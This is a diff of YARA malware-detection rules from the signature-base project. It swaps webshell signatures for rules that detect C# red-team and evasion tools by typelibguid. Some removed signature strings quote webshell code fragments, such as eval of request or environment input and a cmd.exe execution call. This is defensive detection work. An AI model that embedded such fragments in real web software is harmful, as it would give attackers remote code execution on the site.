+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1311-L1324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
-		logic_hash = "fc553942b06b305f7b0d5b072a8d4517b0e51229545440ea9c43e9be01d64efa"
-		score = 70
+		logic_hash = "3d2df79b86b2c1eb4721ee9b6fce920db3e48f9cf96fa693876a6d7d8dad54e6"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
-		$s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+		$typelibguid0lo = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpshell_2_1_Pwhash
+rule SIGNATURE_BASE_HKTL_NET_GUID_Simple_Loader : FILE
 {
 	meta:
-		description = "Web Shell - file pwhash.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L156-L170"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4c26aaf9-187d-5990-b956-1bbf630411f0"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/cribdragg3r/Simple-Loader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1326-L1339"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ba120abac165a5a30044428fac1970d8"
-		logic_hash = "616c0570550cdb9394b5675864d4eec3fa62390f880817406b2a3b63952b69f0"
-		score = 70
+		logic_hash = "0dff8268f2c0c0764736727c78c648567b42cd3e177a7b73aa47a5afdf2f6d4a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
-		$s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
+		$typelibguid0lo = "035ae711-c0e9-41da-a9a2-6523865e8694" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpremoteview
+rule SIGNATURE_BASE_HKTL_NET_GUID_Minidump : FILE
 {
 	meta:
-		description = "Web Shell - file PHPRemoteView.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L171-L185"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "51f64c64-f3fa-5543-83fc-5f0bf881ef03"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/3xpl01tc0d3r/Minidump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1341-L1354"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "29420106d9a81553ef0d1ca72b9934d9"
-		logic_hash = "2de48b8640c0f2089a4a0badb4429127cb61ac972459290041e20b959e4e0c05"
-		score = 70
+		logic_hash = "798c1c569b224442c2f7b98254062e8cd3b008cb6d7aefef3063d9d57dbfbaee"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
-		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+		$typelibguid0lo = "15c241aa-e73c-4b38-9489-9a344ac268a3" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_12302
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbypassuac : FILE
 {
 	meta:
-		description = "Web Shell - file 12302.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L186-L201"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "474d40aa-4bcc-58b5-a129-40bbd3a89e99"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/FatRodzianko/SharpBypassUAC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1356-L1369"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a3930518ea57d899457a62f372205f7f"
-		logic_hash = "0959a138abc791f17344e25e84b24888ddfe238981fc7e3ffd76c0390006ea46"
-		score = 70
+		logic_hash = "fa9aae20fc35bba3b88e32f03e832579ee48d03303e789a13949a859a6da1a3d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
-		$s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
-		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$typelibguid0lo = "0d588c86-c680-4b0d-9aed-418f1bb94255" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Guo
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharppack : FILE
 {
 	meta:
-		description = "Web Shell - file guo.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L202-L216"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "633d074a-b8c2-5148-ad80-6226b99be818"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/Lexus89/SharpPack"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1371-L1391"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9e69a8f499c660ee0b4796af14dc08f0"
-		logic_hash = "efb7055f42dd6be41ea3983cacea1a70b83675c8ebcb88ae3b250066a29e94eb"
-		score = 70
+		logic_hash = "43701a68c6bbb5fc1217f9b47096dcc87d2b1ffa9399ba50df9f7e99cec2c0d8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php ($www= $_POST['ice'])!"
-		$s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
+		$typelibguid1lo = "b59c7741-d522-4a41-bf4d-9badddebb84a" ascii wide
+		$typelibguid2lo = "fd6bdf7a-fef4-4b28-9027-5bf750f08048" ascii wide
+		$typelibguid3lo = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide
+		$typelibguid5lo = "f3037587-1a3b-41f1-aa71-b026efdb2a82" ascii wide
+		$typelibguid6lo = "41a90a6a-f9ed-4a2f-8448-d544ec1fd753" ascii wide
+		$typelibguid7lo = "3787435b-8352-4bd8-a1c6-e5a1b73921f4" ascii wide
+		$typelibguid8lo = "fdd654f5-5c54-4d93-bf8e-faf11b00e3e9" ascii wide
+		$typelibguid9lo = "aec32155-d589-4150-8fe7-2900df4554c8" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Redcod
+rule SIGNATURE_BASE_HKTL_NET_GUID_Salsa_Tools : FILE
 {
 	meta:
-		description = "Web Shell - file redcod.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L217-L231"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "50db578e-6ddb-54d1-a978-e3630a3548c3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/Hackplayers/Salsa-tools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1393-L1407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5c1c8120d82f46ff9d813fbe3354bac5"
-		logic_hash = "eddfd90d27793756bcc685ffe33b2dabc3bb28b9654c33a0f99359e8b6f13678"
-		score = 70
+		logic_hash = "086108496c5ff6df15a26453da7f0922c29132fd4136cca9a02c21afc9c55ad5"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
-		$s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
+		$typelibguid0lo = "276004bb-5200-4381-843c-934e4c385b66" ascii wide
+		$typelibguid1lo = "cfcbf7b6-1c69-4b1f-8651-6bdb4b55f6b9" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Remview_Fix
+rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsdefender_Payload_Downloader : FILE
 {
 	meta:
-		description = "Web Shell - file remview_fix.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L232-L246"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6e494a91-c05e-5a2e-8aa9-77600f3bdd47"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/notkohlrexo/WindowsDefender-Payload-Downloader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1409-L1422"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
-		logic_hash = "0b29ef74fb0786aefe99281360dc4fe27005eac345a36bc14259afa6fc555303"
-		score = 70
+		logic_hash = "587784216f3cf47e291219e08dc2b38bd43b11519d612eaccc631539ecc27c60"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
-		$s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
+		$typelibguid0lo = "2f8b4d26-7620-4e11-b296-bc46eba3adfc" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Cmd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Privilege_Escalation : FILE
 {
 	meta:
-		description = "Web Shell - file cmd.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L247-L262"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "28615807-6637-57fc-ba56-efc64b041b80"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/Mrakovic-ORG/Privilege_Escalation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1424-L1437"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "895ca846858c315a3ff8daa7c55b3119"
-		logic_hash = "8e72b54267c2f83b288cdd43ccd56ae4ab1f95c17f4dde077e637d951df54866"
-		score = 70
+		logic_hash = "18f5d4f917e1e3f0902ab50d6ae2c249782c65d0fc1ed4bc4d06ffae4d286598"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
-		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
-		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$typelibguid0lo = "ed54b904-5645-4830-8e68-52fd9ecbb2eb" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Sh_Server
+rule SIGNATURE_BASE_HKTL_NET_GUID_Marauder : FILE
 {
 	meta:
-		description = "Web Shell - file server.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L263-L276"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f2783477-2853-5dcd-95f5-9f1e07a4a6e8"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/maraudershell/Marauder"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1439-L1452"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d87b019e74064aa90e2bb143e5e16cfa"
-		logic_hash = "9f4d940a381e7bd298a252f485d5f1d26fd191c27f6e86e8fa6028237592a8c3"
-		score = 50
+		logic_hash = "b1a14c6dd80beedd1f385f3b85cec44a443020a76d4da03ea3a53e1c7c0a7b82"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "eval(getenv('HTTP_CODE'));" fullword
+		$typelibguid0lo = "fff0a9a3-dfd4-402b-a251-6046d765ad78" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PH_Vayv_PH_Vayv
+rule SIGNATURE_BASE_HKTL_NET_GUID_AV_Evasion_Tool : FILE
 {
 	meta:
-		description = "Web Shell - file PH Vayv.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L277-L291"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d4257465-38a0-56b9-8402-b92e21b96cb0"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/1y0n/AV_Evasion_Tool"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1454-L1468"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "35fb37f3c806718545d97c6559abd262"
-		logic_hash = "8769400b7b6828849f27092d790d291721c7e1b39dfd2080de5da8e59dd25523"
-		score = 70
+		logic_hash = "9962ed855d43e12ecfcb38337e20db714315d0ec9d83f74d115765a973939b5c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
-		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
+		$typelibguid0lo = "1937ee16-57d7-4a5f-88f4-024244f19dc6" ascii wide
+		$typelibguid1lo = "7898617d-08d2-4297-adfe-5edd5c1b828b" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Ice
+rule SIGNATURE_BASE_HKTL_NET_GUID_Fenrir : FILE
 {
 	meta:
-		description = "Web Shell - file ice.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L292-L305"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cfc6312d-5997-5261-b771-c7f3f30bf86c"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/nccgroup/Fenrir"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1470-L1483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6560b436d3d3bb75e2ef3f032151d139"
-		logic_hash = "d92cc9ac8630b40f23b9ff7cda5a237b4885d30de4b9b497be7512e7eb020a09"
-		score = 70
+		logic_hash = "9b62914aea33db4027c62ecf57854d20942197d1b9212245d1932c0a6b80fe5f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%eval request(\"ice\")%>" fullword
+		$typelibguid0lo = "aecec195-f143-4d02-b946-df0e1433bd2e" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Cihshell_Fix
+rule SIGNATURE_BASE_HKTL_NET_GUID_Stormkitty : FILE
 {
 	meta:
-		description = "Web Shell - file cihshell_fix.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L306-L320"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "09d66661-5b67-5846-9bea-ec682afb62cf"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/LimerBoy/StormKitty"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1485-L1499"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3823ac218032549b86ee7c26f10c4cb5"
-		logic_hash = "59ae76d6828d8c0ddcbafa19063e6dcf25c826386f46df2b8f9674b628365a2b"
-		score = 70
+		logic_hash = "e346a56a555fe8fae6d5f3704a39b97e82de79160da93cba7646eb7d6a98d5a8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
-		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
+		$typelibguid0lo = "a16abbb4-985b-4db2-a80c-21268b26c73d" ascii wide
+		$typelibguid1lo = "98075331-1f86-48c8-ae29-29da39a8f98b" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Shell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Crypter_Runtime_AV_S_Bypass : FILE
 {
 	meta:
-		description = "Web Shell - file shell.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L321-L335"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "726cd57b-d88a-5854-b2e1-76d9bd71a155"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/netreverse/Crypter-Runtime-AV-s-bypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1501-L1514"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e63f5a96570e1faf4c7b8ca6df750237"
-		logic_hash = "5cc698e4ff23ca296b339589d12c24e67c99272e73445604a4552d3023e19636"
-		score = 70
+		logic_hash = "4427fdd90b88576b05bc47c0a24a6daa92e066868e3c738007bfcf9c29058b2e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
-		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
+		$typelibguid0lo = "c25e39a9-8215-43aa-96a3-da0e9512ec18" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Private_I3Lue
+rule SIGNATURE_BASE_HKTL_NET_GUID_Runasuser : FILE
 {
 	meta:
-		description = "Web Shell - file Private-i3lue.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L336-L349"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ead7819a-1397-5953-888f-2176e4041375"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/atthacks/RunAsUser"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1516-L1529"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "13f5c7a035ecce5f9f380967cf9d4e92"
-		logic_hash = "274586f2c451eda45c3a52b615961dbba806f8d25e34cc358e661fcfd1143d08"
-		score = 70
+		logic_hash = "8ac64be85ae1a55c3390dace5e43580453568758a712bdca0a5e81817d0a7fb0"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "case 15: $image .= \"\\21\\0\\"
+		$typelibguid0lo = "9dff282c-93b9-4063-bf8a-b6798371d35a" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Up
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hwidbypass : FILE
 {
 	meta:
-		description = "Web Shell - file up.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L350-L365"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "62b0541b-6eec-546e-8445-85d25bb0d784"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/yunseok/HWIDbypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1531-L1544"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7edefb8bd0876c41906f4b39b52cd0ef"
-		logic_hash = "22f444ce4068f46c0b57e566faca0c6377346e403de592b0e51869781fda31a9"
-		score = 70
+		logic_hash = "1b19d3560fdf5bfbfd3c4fb434474cdde5efa42de611fb97e76312664b8cedb7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
-		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
-		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
+		$typelibguid0lo = "47e08791-d124-4746-bc50-24bd1ee719a6" ascii wide
 
 	condition:
